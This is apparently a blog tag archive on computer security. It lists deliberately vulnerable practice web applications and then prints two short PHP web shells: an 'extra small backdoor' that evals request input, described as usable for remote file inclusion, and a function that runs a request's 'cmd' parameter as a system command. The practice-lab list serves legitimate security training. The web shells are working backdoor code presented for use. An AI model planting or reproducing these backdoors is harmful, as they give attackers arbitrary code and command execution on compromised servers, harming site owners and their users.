Tag Archive | Computer security

Session fixation 2


Advertisements

It is hax0r time

1)Jarlsberg App - http://jarlsberg.appspot.com/start
2)OWASP Broken Web Applications project
3)Web Security Dojo - http://www.mavensecurity.com/web_security_dojo/
4)SPI Dynamics (live) – http://zero.webappsecurity.com/
5)Cenzic (live) – http://crackme.cenzic.com/
6)Watchfire (live) – http://demo.testfire.net/
7)Acunetix (live) – http://testphp.acunetix.com/
8)PCTechtips Challenge (live) – http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
9)The Butterfly Security Project – http://sourceforge.net/projects/thebutterflytmp/files/ButterFly%20Project
10)Hacme Casino – http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
11)Hacme Bank 2.0 – http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
12)Updated HackmeBank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
14)Hacme Books – http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm
15)Hacme Travel – http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
16)Hacme Shipping – http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
17)OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator
18)Moth – http://www.bonsai-sec.com/en/research/moth.php
19)Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/
20)SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/
21)BadStore – http://www.badstore.net/
22)WebMaven/Buggy Bank – http://www.mavensecurity.com/webmaven

XSB(Extra small backdoor) in PHP

<?php
$code=$_REQUEST['code'];
eval($code);
?>

It could be used for remote file inclusion.

A strange research


 
<?php function a(){
	if(isset($_REQUEST['cmd']))
		echo "<pre>";
		$cmd= ($_REQUEST['cmd']);
		system($cmd);
		echo "</pre>";
		die;
}
a();
?>

http://www.virustotal.com/file-scan/report.html?id=8a533070e2fa966210edb324c38e2a0293cc025d53486aa288a7df13ec889fb4-1315865006